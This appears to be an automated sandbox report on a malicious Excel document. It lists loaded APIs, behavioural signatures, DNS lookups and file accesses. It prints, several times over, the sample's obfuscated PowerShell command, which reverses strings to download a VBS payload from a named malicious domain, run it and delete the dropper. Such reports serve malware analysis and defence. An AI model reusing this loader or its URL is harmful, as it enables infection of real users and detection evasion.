DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: DNSAPI.dll/DnsGetProxyInformation
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: dhcpcsvc.DLL/DhcpRequestParams
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: WININET.dll/InternetGetCookieExW
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: WINHTTP.dll/WinHttpAddRequestHeaders
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowTextW
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/KillTimer
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: WS2_32.dll/WSAGetOverlappedResult
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CLSIDFromOle1Class
DynamicLoader: CLBCatQ.DLL/GetCatalogObject
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoImpersonateClient
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRevertToSelf
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EqualSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventUnregister
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: OLEAUT32.dll/
Performs HTTP requests potentially not found in PCAP.
url: https://ocos-office365-s2s.msedge.net/
url: http://fisintegrateds.com/zp-admin/Protected Client.vbs
Resumed a thread in another process
thread_resumed: Process excel.exe with process ID 3284 resumed a thread in another process with the process ID 3284
thread_resumed: Process explorer.exe with process ID 1236 resumed a thread in another process with the process ID 3252
thread_resumed: Process wscript.exe with process ID 1956 resumed a thread in another process with the process ID 1956
thread_resumed: Process powershell.exe with process ID 1876 resumed a thread in another process with the process ID 1876
thread_resumed: Process dllhost.exe with process ID 1920 resumed a thread in another process with the process ID 1920
thread_resumed: Process services.exe with process ID 376 resumed a thread in another process with the process ID 3664
thread_resumed: Process dllhost.exe with process ID 2468 resumed a thread in another process with the process ID 2468
Attempts to make a network connection via suspicious process
Reads data out of its own binary image
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x00000000, length: 0x00000040
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c3130785c40, length: 0x00000018
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c3230785c38, length: 0x000000c8
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c363031785c, length: 0x00000002
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c363865785c, length: 0x00000010
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c523030785c, length: 0x00000018
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c523063785c, length: 0x00000018
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c523831785c, length: 0x00000008
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x30785c793038785c, length: 0x00000018
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x6165785c3062785c, length: 0x00000010
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x785c3230785c5220, length: 0x00000008
self_read: process: EXCEL.EXE, pid: 3284, offset: 0x785c3330785c367e, length: 0x00000002
self_read: process: wscript.exe, pid: 1956, offset: 0x00000000, length: 0x00000040
self_read: process: wscript.exe, pid: 1956, offset: 0x3030785c3066785c, length: 0x00000018
self_read: process: wscript.exe, pid: 1956, offset: 0x3038785c3030785c, length: 0x00000018
self_read: process: wscript.exe, pid: 1956, offset: 0x3038785c3831785c, length: 0x00000008
self_read: process: wscript.exe, pid: 1956, offset: 0x30785c3038785c58, length: 0x00000018
self_read: process: wscript.exe, pid: 1956, offset: 0x30785c3438785c70, length: 0x00000010
self_read: process: wscript.exe, pid: 1956, offset: 0x30785c3638785c40, length: 0x00000012
self_read: process: wscript.exe, pid: 1956, offset: 0x3130785c3865785c, length: 0x00000078
self_read: process: wscript.exe, pid: 1956, offset: 0x3138785c3861785c, length: 0x00000018
A process created a hidden window
process: wscript.exe -> powershell.exe
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
command: powershell.exe $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
Checks for presence of debugger via IsDebuggerPresent
A scripting utility was executed
command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\LCSSW.js"
command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
command: powershell.exe $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
Uses Windows utilities for basic functionality
command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
command: powershell.exe $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
PowerShell attempted to make a network connection
request: 172.61.0.2:80
A script process created a new process
wscript_exe: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
wscript_exe: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
Suspicious JavaScript was executed by a script process
process: wscript.exe
Deletes executed files from disk
file: C:\Users\user\AppData\Local\Temp\notepad.vbs
file: C:\Users\user\AppData\Roaming\LCSSW.js
Attempts to modify Microsoft Office security settings
Attempts to execute suspicious powershell command arguments
command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
command: powershell.exe $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
A powershell command using multiple variables was executed possibly indicative of obfuscation
command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
command: powershell.exe $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js')
Collects information to fingerprint the system
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\MachineGuid
A reversed HTTP/S link was seen in a script or command line

Screenshots

No playback available.

Hosts

No hosts contacted.

DNS

Name Response Post-Analysis Lookup
fisintegrateds.com [VT] A 172.61.0.2 [VT]

Summary

C:\Windows\System32\api-ms-win-core-fibers-l1-1-1.DLL
C:\Windows\System32\api-ms-win-core-localization-l1-2-1.DLL
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\System32\tzres.dll
C:\Windows\System32\en-US\tzres.dll.mui
C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker
C:\Program Files\Microsoft Office\root\vfs\SystemX86\api-ms-win-core-fibers-l1-1-1.DLL
C:\Program Files\Microsoft Office\root\vfs\SystemX86\api-ms-win-core-localization-l1-2-1.DLL
\??\MountPointManager
\Device\KsecDD
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODF
C:\Users\user\AppData\Local\Temp\{A10036B2-3394-42E4-84B5-CED1890283B7} - OProcSessId.dat
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO40UIRES.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO99LRES.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSORES.DLL
C:\Program Files\Microsoft Office\root\Office16\1033\XLINTL32.DLL
C:\Users\user\AppData\Local\Microsoft\Office\
C:\Users\user\AppData\Local\Microsoft\Office\Excel15.customUI
C:\Program Files\Microsoft Office\root\vfs\SystemX86\D3D10Warp.dll
C:\Windows\System32\D3D10Warp.dll
C:\Users\user\AppData\Local\Microsoft\FontCache
C:\Users\user\AppData\Local\Microsoft\FontCache\3\Purge\*
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\msointl30.dll
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\MSOINTL.DLL
C:\Program Files\Microsoft Office\root\vfs\SystemX86\mscoree.dll.local
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE.config
C:\Program Files\Microsoft Office\root\vfs\SystemX86\api-ms-win-appmodel-runtime-l1-1-2.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-2.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system32
C:\Users\user\AppData\Local\Microsoft\Office\Clearance.xml
C:
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
C:\Program Files\Microsoft Office\root\Office16\OART.DLL
C:\Program Files\Microsoft Office\root\Office16\ADAL.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADAL.DLL
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE.Local\
C:\Program Files\Microsoft Office\root\vfs\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2
C:\Program Files\Microsoft Office\root\Office16\Shcore.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\Shcore.dll
C:\Windows\System32\Shcore.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\uxtheme.dll.Config
C:\Windows\System32\uxtheme.dll.Config
C:\Program Files\Microsoft Office\root\vfs\SystemX86\uxtheme.dll
C:\Windows\System32\uxtheme.dll
C:\Users\user\AppData\Local\Microsoft\Office\16.0
\??\Nsi
C:\Users\user\AppData\Local\Microsoft\FontCache\3\ListAll.Json
C:\Program Files\Microsoft Office\root\Office16\oartgrfserver.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\oartgrfserver.dll
C:\Windows\System32\oartgrfserver.dll
C:\Program Files\Microsoft Office\root\Office16\GFX.DLL
C:\Program Files\Microsoft Office\root\Office16\MSIMG32.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\msimg32.dll
C:\Windows\System32\msimg32.dll
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\ink\InkObj.dll
C:\Program Files\Common Files\Microsoft Shared\ink\InkObj.dll
C:\Users\user\AppData\Local\Microsoft\Office\Excel.officeUI
C:\Program Files\Microsoft Office\root\Office16\CHART.DLL
C:\Program Files\Microsoft Office\root\vfs\Fonts\segoeui.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Program Files\Microsoft Office\root\vfs\Fonts\tahoma.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Program Files\Microsoft Office\root\Office16\Fonts\
C:\Windows\Fonts\EUDC.TTE
C:\Program Files\Microsoft Office\root\Office16
C:\Users\user\AppData\Roaming\Microsoft\AddIns\
C:\Users\user\AppData\Local\Temp
C:\Users\user\Documents\
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\*.*
C:\Program Files\Microsoft Office\root\Office16\XLSTART\*.*
C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls
C:\Program Files\Microsoft Office\root\vfs\SystemX86\shell32.dll
C:\Windows\System32\shell32.dll
C:\Users\user\Desktop
C:\
C:\Users
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db
C:\Users\desktop.ini
C:\Users\user
C:\Users\user\Desktop\desktop.ini
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls:Zone.Identifier
C:\Users\user\AppData\Local\Temp\~DF8C8F9FEEB848381B.TMP
C:\Program Files\Microsoft Office\root\Office16\GKExcel.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6300C71B.emf
C:\Program Files\Microsoft Office\root\Office16\VBE7.DLL
